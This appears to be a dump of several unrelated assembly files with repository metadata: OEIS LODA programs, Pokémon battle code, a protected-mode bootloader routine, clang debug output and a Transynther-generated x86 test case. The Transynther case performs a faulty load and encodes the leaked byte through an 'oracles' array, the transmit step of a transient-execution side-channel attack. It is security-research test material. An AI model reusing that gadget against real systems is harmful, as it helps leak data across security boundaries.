] | null | null | null | programs/oeis/165/A165478.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/165/A165478.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A165478: Positions of zeros in A165477.
; 0,131070,131071,262141,262142,393212,393213,524283,524284,655354,655355,786425,786426,917496,917497,1048567,1048568,1179638,1179639,1310709,1310710,1441780,1441781,1572851,1572852,1703922,1703923
mov $2,$0
sub $4,$0
mul $0,2
div $0,4
mov $1,$0
mov $0,5
mov $3,$1
mov $1,131067
add $3,1
add $4,$3
mul $4,131069
sub $1,$4
lpb $0,1
add $1,5
div $0,$1
sub $0,1
lpe
sub $1,3
add $1,$2
| 18.73913 | 197 | 0.705336 |
afcfaea1bd2bb6f570505a9f46f412a2f93ca543 | 483 | asm | Assembly | programs/oeis/053/A053645.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/053/A053645.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/053/A053645.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A053645: Distance to largest power of 2 less than or equal to n; write n in binary, change the first digit to zero, and convert back to decimal.
; 0,0,1,0,1,2,3,0,1,2,3,4,5,6,7,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36
lpb $0
sub $0,1
mov $1,$0
mul $2,2
add $2,1
trn $0,$2
lpe
mov $0,$1
| 40.25 | 256 | 0.6294 |
f45773694e2f894a48e88409e122e46e8b6e3252 | 588 | asm | Assembly | oeis/092/A092557.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/092/A092557.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/092/A092557.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A092557: Triangle read by rows: T(1,1) = 1; for n>=2, write the first n^2 integers in an n X n array beginning with 1 in the upper left proceeding left to right and top to bottom; then T(n,k) is the last prime in the k-th row.
; 1,2,3,3,5,7,3,7,11,13,5,7,13,19,23,5,11,17,23,29,31,7,13,19,23,31,41,47,7,13,23,31,37,47,53,61,7,17,23,31,43,53,61,71,79,7,19,29,37,47,59,67,79,89,97,11,19,31,43,53,61,73,83,97,109,113,11,23,31,47,59,71,83,89
seq $0,75362 ; Triangle read by rows with the n-th row containing the first n multiples of n.
seq $0,136548 ; a(n) = max {k >= 1 | sigma(k) <= n}.
| 98 | 228 | 0.670068 |
269195406450c24b3a3afb014dafcbc7dc6044f9 | 1,230 | asm | Assembly | engine/battle/move_effects/spikes.asm | AtmaBuster/pokeplat-gen2 | fa83b2e75575949b8f72cb2c48f7a1042e97f70f | [
"blessing"
] | 6 | 2021-06-19T06:41:19.000Z | 2022-02-15T17:12:33.000Z | engine/battle/move_effects/spikes.asm | AtmaBuster/pokeplat-gen2-old | 01e42c55db5408d72d89133dc84a46c699d849ad | [
"blessing"
] | null | null | null | engine/battle/move_effects/spikes.asm | AtmaBuster/pokeplat-gen2-old | 01e42c55db5408d72d89133dc84a46c699d849ad | [
"blessing"
] | 3 | 2021-01-15T18:45:40.000Z | 2021-10-16T03:35:27.000Z | BattleCommand_spikes:
; spikes
ld hl, wEnemyScreens
ldh a, [hBattleTurn]
and a
jr z, .asm_3768e
ld hl, wPlayerScreens
.asm_3768e
; Fails if 3 layers of spikes are already down
ld a, [hl]
and MASK_SPIKES
cp SPIKES_3
jr z, .failed
; Nothing else stops it from working.
inc [hl]
call AnimateCurrentMove2
ld hl, SpikesText
jp StdBattleTextbox
.failed
farjump FailMove
BattleCommand_stealthrock:
; stealthrock
ld hl, wEnemyScreens
ldh a, [hBattleTurn]
and a
jr z, .asm_3768e
ld hl, wPlayerScreens
.asm_3768e
; Fails if already set
bit SCREENS_STEALTH_ROCK, [hl]
jr nz, .failed
; Nothing else stops it from working.
set SCREENS_STEALTH_ROCK, [hl]
call AnimateCurrentMove2
ld hl, StealthRockText
jp StdBattleTextbox
.failed
farjump FailMove
BattleCommand_toxicspikes:
; toxicspikes
ld hl, wEnemyScreens
ldh a, [hBattleTurn]
and a
jr z, .asm_3768e
ld hl, wPlayerScreens
.asm_3768e
; Fails if 2 layers of toxic spikes are already down
ld a, [hl]
and MASK_TOXIC_SPIKES
cp TOXIC_SPIKES_2
jr z, .failed
; Nothing else stops it from working.
ld a, [hl]
add TOXIC_SPIKES_1
ld [hl], a
call AnimateCurrentMove2
ld hl, ToxicSpikesText
jp StdBattleTextbox
.failed
farjump FailMove
| 14.302326 | 52 | 0.749593 |
683cbac3f02f0f1a26a865c59aed76f94fc05c49 | 279 | asm | Assembly | programs/oeis/053/A053796.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/053/A053796.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/053/A053796.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A053796: n^2+n modulo 5.
; 0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0,0,2,1,2,0
mov $1,$0
mul $1,$0
add $1,$0
mod $1,5
| 34.875 | 211 | 0.508961 |
aaeeb925d6d5d064b6b68e24db4f319e40e27a12 | 9,458 | asm | Assembly | Transynther/x86/_processed/US/_ht_zr_/i9-9900K_12_0xca_notsx.log_21829_1951.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/US/_ht_zr_/i9-9900K_12_0xca_notsx.log_21829_1951.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/US/_ht_zr_/i9-9900K_12_0xca_notsx.log_21829_1951.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r14
push %r8
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_A_ht+0x14b36, %r8
nop
nop
add %r14, %r14
movups (%r8), %xmm2
vpextrq $0, %xmm2, %rbx
nop
nop
nop
nop
nop
cmp $5740, %r11
lea addresses_A_ht+0x87d8, %rsi
lea addresses_WC_ht+0x1c02e, %rdi
nop
nop
nop
nop
xor $24591, %r12
mov $1, %rcx
rep movsq
nop
nop
nop
nop
nop
dec %rdi
lea addresses_WC_ht+0xecc4, %rcx
nop
nop
mfence
mov $0x6162636465666768, %r14
movq %r14, (%rcx)
cmp $21288, %rbx
lea addresses_D_ht+0x13e64, %r8
nop
nop
nop
xor %r11, %r11
movups (%r8), %xmm0
vpextrq $0, %xmm0, %r12
nop
nop
xor $25826, %rbx
lea addresses_WC_ht+0x13184, %r11
nop
nop
nop
nop
nop
cmp $42092, %rdi
mov $0x6162636465666768, %rcx
movq %rcx, (%r11)
nop
nop
cmp $52953, %r8
lea addresses_WT_ht+0x1e00c, %rsi
lea addresses_normal_ht+0x1da59, %rdi
clflush (%rsi)
and $25567, %rbx
mov $23, %rcx
rep movsq
nop
nop
nop
nop
cmp $64494, %rsi
lea addresses_D_ht+0x8644, %rsi
lea addresses_WC_ht+0x2584, %rdi
nop
nop
nop
nop
nop
cmp %r12, %r12
mov $105, %rcx
rep movsw
nop
nop
nop
nop
dec %rsi
lea addresses_A_ht+0x1956c, %rbx
sub $25119, %r11
movb $0x61, (%rbx)
nop
nop
nop
xor %rbx, %rbx
lea addresses_UC_ht+0xe304, %rsi
lea addresses_WT_ht+0x1a644, %rdi
nop
nop
nop
nop
nop
xor %r11, %r11
mov $81, %rcx
rep movsb
nop
cmp %rbx, %rbx
lea addresses_WC_ht+0x1c084, %rbx
nop
nop
cmp %rdi, %rdi
mov (%rbx), %r12w
nop
nop
nop
nop
nop
mfence
lea addresses_normal_ht+0x9e04, %rsi
lea addresses_UC_ht+0xef44, %rdi
nop
nop
nop
cmp $16949, %r14
mov $48, %rcx
rep movsq
nop
nop
and $25750, %rdi
lea addresses_A_ht+0x6c04, %r11
nop
nop
nop
nop
nop
and $9077, %r12
mov (%r11), %rcx
sub $10426, %rbx
lea addresses_D_ht+0x1d204, %r12
nop
add $57489, %rdi
movups (%r12), %xmm2
vpextrq $1, %xmm2, %r14
inc %rdi
lea addresses_UC_ht+0x1b0ac, %rsi
lea addresses_UC_ht+0x12644, %rdi
nop
nop
sub %r12, %r12
mov $60, %rcx
rep movsq
nop
nop
nop
nop
nop
add $11737, %rcx
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %r8
pop %r14
pop %r12
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %r14
push %r15
push %r8
push %rcx
push %rdx
push %rsi
// Store
lea addresses_normal+0x18644, %r8
nop
nop
nop
nop
sub %rdx, %rdx
movw $0x5152, (%r8)
nop
nop
nop
nop
dec %rsi
// Store
lea addresses_D+0x1b7bc, %r8
inc %rcx
mov $0x5152535455565758, %rdx
movq %rdx, (%r8)
nop
dec %r8
// Store
lea addresses_D+0x1da44, %rdx
nop
nop
nop
nop
and %r8, %r8
mov $0x5152535455565758, %r14
movq %r14, %xmm0
vmovups %ymm0, (%rdx)
nop
sub $50098, %r8
// Store
lea addresses_D+0xaf44, %rcx
nop
and $1195, %r8
movw $0x5152, (%rcx)
nop
sub $3664, %r13
// Store
lea addresses_normal+0xdb34, %r13
nop
nop
nop
nop
nop
xor $43031, %rsi
movw $0x5152, (%r13)
nop
nop
nop
nop
xor %r15, %r15
// Store
lea addresses_normal+0x3a44, %rdx
nop
xor $41382, %r15
mov $0x5152535455565758, %r13
movq %r13, %xmm3
movups %xmm3, (%rdx)
nop
nop
xor %r13, %r13
// Store
lea addresses_normal+0x13444, %r13
nop
nop
nop
and %rdx, %rdx
movw $0x5152, (%r13)
nop
nop
dec %rdx
// Faulty Load
lea addresses_US+0x8644, %rdx
clflush (%rdx)
nop
nop
nop
nop
xor %rcx, %rcx
vmovups (%rdx), %ymm0
vextracti128 $1, %ymm0, %xmm0
vpextrq $0, %xmm0, %rsi
lea oracles, %rcx
and $0xff, %rsi
shlq $12, %rsi
mov (%rcx,%rsi,1), %rsi
pop %rsi
pop %rdx
pop %rcx
pop %r8
pop %r15
pop %r14
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_US', 'NT': False, 'AVXalign': True, 'size': 16, 'congruent': 0}}
{'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_normal', 'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 10}}
{'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_D', 'NT': True, 'AVXalign': False, 'size': 8, 'congruent': 3}}
{'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_D', 'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 9}}
{'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_D', 'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 8}}
{'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_normal', 'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 3}}
{'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_normal', 'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 9}}
{'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_normal', 'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 5}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'same': True, 'type': 'addresses_US', 'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 0}}
<gen_prepare_buffer>
{'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_A_ht', 'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 0}}
{'OP': 'REPM', 'src': {'same': False, 'congruent': 2, 'type': 'addresses_A_ht'}, 'dst': {'same': False, 'congruent': 1, 'type': 'addresses_WC_ht'}}
{'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_WC_ht', 'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 7}}
{'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_D_ht', 'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 1}}
{'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_WC_ht', 'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 3}}
{'OP': 'REPM', 'src': {'same': False, 'congruent': 3, 'type': 'addresses_WT_ht'}, 'dst': {'same': False, 'congruent': 0, 'type': 'addresses_normal_ht'}}
{'OP': 'REPM', 'src': {'same': False, 'congruent': 11, 'type': 'addresses_D_ht'}, 'dst': {'same': True, 'congruent': 3, 'type': 'addresses_WC_ht'}}
{'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_A_ht', 'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 2}}
{'OP': 'REPM', 'src': {'same': False, 'congruent': 6, 'type': 'addresses_UC_ht'}, 'dst': {'same': False, 'congruent': 10, 'type': 'addresses_WT_ht'}}
{'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_WC_ht', 'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 6}}
{'OP': 'REPM', 'src': {'same': False, 'congruent': 6, 'type': 'addresses_normal_ht'}, 'dst': {'same': False, 'congruent': 6, 'type': 'addresses_UC_ht'}}
{'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_A_ht', 'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 6}}
{'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_D_ht', 'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 0}}
{'OP': 'REPM', 'src': {'same': False, 'congruent': 1, 'type': 'addresses_UC_ht'}, 'dst': {'same': False, 'congruent': 11, 'type': 'addresses_UC_ht'}}
{'46': 507, '00': 20443, '49': 7, '44': 872}
00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 46 00 00 00 00 00 00 00 00 00 00 00 00 44 00 44 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 46 00 00 00 00 00 00 44 00 00 46 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 44 00 00 00 00 00 44 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 44 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 44 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 44 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 44 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
| 29.835962 | 2,999 | 0.654261 |
6c4fedd80277785042f3ff8b38514efe7a4f789a | 1,105 | asm | Assembly | boot/16bit/pm/switch_to_pm.asm | DanielEliad/os | 1ff0259a35ceb172eab5774bf4af6d671b6a9b38 | [
"MIT"
] | null | null | null | boot/16bit/pm/switch_to_pm.asm | DanielEliad/os | 1ff0259a35ceb172eab5774bf4af6d671b6a9b38 | [
"MIT"
] | null | null | null | boot/16bit/pm/switch_to_pm.asm | DanielEliad/os | 1ff0259a35ceb172eab5774bf4af6d671b6a9b38 | [
"MIT"
] | null | null | null | [bits 16]
; Switch to protected mode
switch_to_pm:
cli ; We must switch of interrupts until we have
; set -up the protected mode interrupt vector
; otherwise interrupts will run riot.
lgdt [gdt_descriptor] ; Load our global descriptor table , which defines
; the protected mode segments ( e.g. for code and data )
mov eax , cr0 ; To make the switch to protected mode , we set
or eax , 0x1 ; the first bit of CR0 , a control register
mov cr0 , eax
jmp CODE_SEG:init_pm ; Make a far jump ( i.e. to a new segment ) to our 32 - bit
; code. This also forces the CPU to flush its cache of
; pre - fetched and real - mode decoded instructions , which can
; cause problems.
[bits 32]
; Initialise registers and the stack once in PM.
init_pm:
mov ax , DATA_SEG ; Now in PM , our old segments are meaningless ,
mov ds , ax ; so we point our segment registers to the
mov ss , ax ; data selector we defined in our GDT
mov es , ax
mov fs , ax
mov gs , ax
mov ebp , 0x30000 ; Update our stack position so it is right
mov esp , ebp ; at the top of the free space.
call BEGIN_PM ; Finally , call some well - known label
| 38.103448 | 80 | 0.728507 |
f8c8524a698817ad4cf85a9697429c0be8d17eca | 559,857 | asm | Assembly | test/filters-cases/clanglib-bug2898.asm | OfekShilon/compiler-explorer | 7ee2ab17f29470575443bd67e5685ac54ce76158 | [
"BSD-2-Clause"
] | 4,668 | 2017-01-02T19:35:10.000Z | 2020-05-16T03:18:45.000Z | test/filters-cases/clanglib-bug2898.asm | OfekShilon/compiler-explorer | 7ee2ab17f29470575443bd67e5685ac54ce76158 | [
"BSD-2-Clause"
] | 1,750 | 2017-01-02T19:37:06.000Z | 2020-05-16T14:54:29.000Z | test/filters-cases/clanglib-bug2898.asm | OfekShilon/compiler-explorer | 7ee2ab17f29470575443bd67e5685ac54ce76158 | [
"BSD-2-Clause"
] | 620 | 2017-01-03T00:29:17.000Z | 2020-05-14T09:27:47.000Z | .text
.intel_syntax noprefix
.file "example.cpp"
.file 1 "/opt/compiler-explorer/libs/eve/trunk/include/eve/function" "convert.hpp"
.file 2 "/opt/compiler-explorer/libs/eve/trunk/include/eve/detail/function" "bit_cast.hpp"
.file 3 "/usr/include/x86_64-linux-gnu/bits" "types.h"
.file 4 "/usr/include/x86_64-linux-gnu/bits" "stdint-uintn.h"
.file 5 "/opt/compiler-explorer/libs/eve/trunk/include/eve/detail" "category.hpp"
.file 6 "/opt/compiler-explorer/clang-12.0.1/lib/clang/12.0.1/include" "avxintrin.h"
.file 7 "/opt/compiler-explorer/clang-12.0.1/lib/clang/12.0.1/include" "emmintrin.h"
.file 8 "/usr/include/x86_64-linux-gnu/bits/types" "__mbstate_t.h"
.file 9 "/usr/include/x86_64-linux-gnu/bits/types" "mbstate_t.h"
.file 10 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0" "cwchar"
.file 11 "/usr/include/x86_64-linux-gnu/bits/types" "wint_t.h"
.file 12 "/usr/include" "wchar.h"
.file 13 "/usr/include/x86_64-linux-gnu/bits/types" "struct_FILE.h"
.file 14 "/opt/compiler-explorer/clang-12.0.1/lib/clang/12.0.1/include" "stddef.h"
.file 15 "/usr/include/x86_64-linux-gnu/bits/types" "__FILE.h"
.file 16 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0/bits" "exception_ptr.h"
.file 17 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0/x86_64-linux-gnu/bits" "c++config.h"
.file 18 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0/debug" "debug.h"
.file 19 "/usr/include/x86_64-linux-gnu/bits" "stdint-intn.h"
.file 20 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0" "cstdint"
.file 21 "/usr/include" "stdint.h"
.file 22 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0" "clocale"
.file 23 "/usr/include" "locale.h"
.file 24 "/usr/include" "ctype.h"
.file 25 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0" "cctype"
.file 26 "/usr/include" "stdlib.h"
.file 27 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0/bits" "std_abs.h"
.file 28 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0" "cstdlib"
.file 29 "/usr/include/x86_64-linux-gnu/bits" "stdlib-float.h"
.file 30 "/usr/include/x86_64-linux-gnu/bits" "stdlib-bsearch.h"
.file 31 "/usr/include/x86_64-linux-gnu/bits/types" "FILE.h"
.file 32 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0" "cstdio"
.file 33 "/usr/include/x86_64-linux-gnu/bits/types" "__fpos_t.h"
.file 34 "/usr/include" "stdio.h"
.file 35 "/usr/include/x86_64-linux-gnu/bits" "stdio.h"
.file 36 "/usr/include" "wctype.h"
.file 37 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0" "cwctype"
.file 38 "/usr/include/x86_64-linux-gnu/bits" "wctype-wchar.h"
.file 39 "/opt/compiler-explorer/clang-12.0.1/lib/clang/12.0.1/include" "__stddef_max_align_t.h"
.file 40 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0" "cstddef"
.file 41 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0" "stdlib.h"
.file 42 "/usr/include" "string.h"
.file 43 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0" "cstring"
.globl _Z3cvtN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEE # -- Begin function _Z3cvtN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEE
.p2align 4, 0x90
.type _Z3cvtN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEE,@function
_Z3cvtN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEE: # @_Z3cvtN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEE
.Lfunc_begin0:
.file 44 "/app" "example.cpp"
.loc 44 12 0 # example.cpp:12:0
.cfi_startproc
# %bb.0:
#DEBUG_VALUE: cvt:x <- $xmm0
#DEBUG_VALUE: cvt:x <- $xmm0
#DEBUG_VALUE: operator()<eve::logical<eve::wide<short, eve::fixed<8> > > &, eve::as<eve::logical<unsigned int> > >:args <- undef
#DEBUG_VALUE: operator()<eve::logical<eve::wide<short, eve::fixed<8> > > &, eve::as<eve::logical<unsigned int> > >:args <- undef
#DEBUG_VALUE: call<eve::logical<eve::wide<short, eve::fixed<8> > > &, eve::as<eve::logical<unsigned int> > &>:d <- undef
#DEBUG_VALUE: call<eve::logical<eve::wide<short, eve::fixed<8> > > &, eve::as<eve::logical<unsigned int> > &>:args <- undef
#DEBUG_VALUE: convert_<short, eve::fixed<8>, unsigned int>: <- undef
#DEBUG_VALUE: convert_<short, eve::fixed<8>, unsigned int>: <- undef
#DEBUG_VALUE: convert_<short, eve::fixed<8>, unsigned int>:v0 <- undef
#DEBUG_VALUE: convert_<short, eve::fixed<8>, unsigned int>:tgt <- undef
#DEBUG_VALUE: convert_<eve::wide<short, eve::fixed<8> >, unsigned int>: <- undef
#DEBUG_VALUE: convert_<eve::wide<short, eve::fixed<8> >, unsigned int>: <- undef
#DEBUG_VALUE: convert_<eve::wide<short, eve::fixed<8> >, unsigned int>:v0 <- undef
#DEBUG_VALUE: convert_<eve::wide<short, eve::fixed<8> >, unsigned int>:tgt <- undef
#DEBUG_VALUE: bits:this <- undef
#DEBUG_VALUE: to_bits<short, eve::fixed<8> >: <- undef
#DEBUG_VALUE: to_bits<short, eve::fixed<8> >:p <- undef
#DEBUG_VALUE: mask:this <- undef
#DEBUG_VALUE: to_mask<short, eve::fixed<8> >: <- undef
#DEBUG_VALUE: to_mask<short, eve::fixed<8> >:p <- undef
#DEBUG_VALUE: wide:this <- undef
#DEBUG_VALUE: wide:r <- undef
#DEBUG_VALUE: wide_storage:this <- undef
#DEBUG_VALUE: wide_storage:r <- undef
#DEBUG_VALUE: operator()<eve::wide<short, eve::fixed<8> >, eve::as<int> >:args <- undef
#DEBUG_VALUE: operator()<eve::wide<short, eve::fixed<8> >, eve::as<int> >:args <- undef
#DEBUG_VALUE: call<eve::wide<short, eve::fixed<8> > &, eve::as<int> &>:d <- undef
#DEBUG_VALUE: call<eve::wide<short, eve::fixed<8> > &, eve::as<int> &>:args <- undef
#DEBUG_VALUE: convert_<short, eve::fixed<8>, int>: <- undef
#DEBUG_VALUE: convert_<short, eve::fixed<8>, int>: <- undef
#DEBUG_VALUE: convert_<short, eve::fixed<8>, int>:v0 <- undef
#DEBUG_VALUE: convert_<short, eve::fixed<8>, int>:tgt <- undef
#DEBUG_VALUE: convert_<short, eve::fixed<8>, unsigned int>:c <- 16908296
.file 45 "/opt/compiler-explorer/libs/eve/trunk/include/eve/module/real/core/function/regular/simd/x86" "convert_256.hpp"
